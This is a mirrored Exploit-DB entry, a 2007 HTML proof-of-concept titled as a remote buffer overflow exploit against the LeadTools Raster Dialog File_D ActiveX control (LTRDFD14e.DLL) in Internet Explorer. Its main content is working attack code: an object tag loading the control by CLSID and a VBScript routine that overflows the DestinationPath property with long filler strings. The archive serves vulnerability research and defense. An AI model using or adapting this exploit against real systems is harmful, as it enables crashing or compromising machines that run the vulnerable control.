exploit-db-mirror/exploits/windows/dos/3986.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

34 lines
No EOL
1.2 KiB
HTML

<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/25</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">---------------------------------------------------------------------------------------------------
<b>LeadTools Raster Dialog File_D Object (LTRDFD14e.DLL v. 14.5.0.44) Remote Buffer Overflow Exploit</b>
url: http://www.leadtools.com/
price: eheheh, take a look at thier site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.
---------------------------------------------------------------------------------------------------
<object classid='clsid:00140BB5-B1BA-11CE-ABC6-F5B2E79D9E3F' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
buff = String(4408, "A")
get_EDX = "aaaa"
buff1 = String(8992, "B")
test.DestinationPath = buff + get_EDX + buff1
End Sub
</script>
</span></span>
</code></pre>
# milw0rm.com [2007-05-25]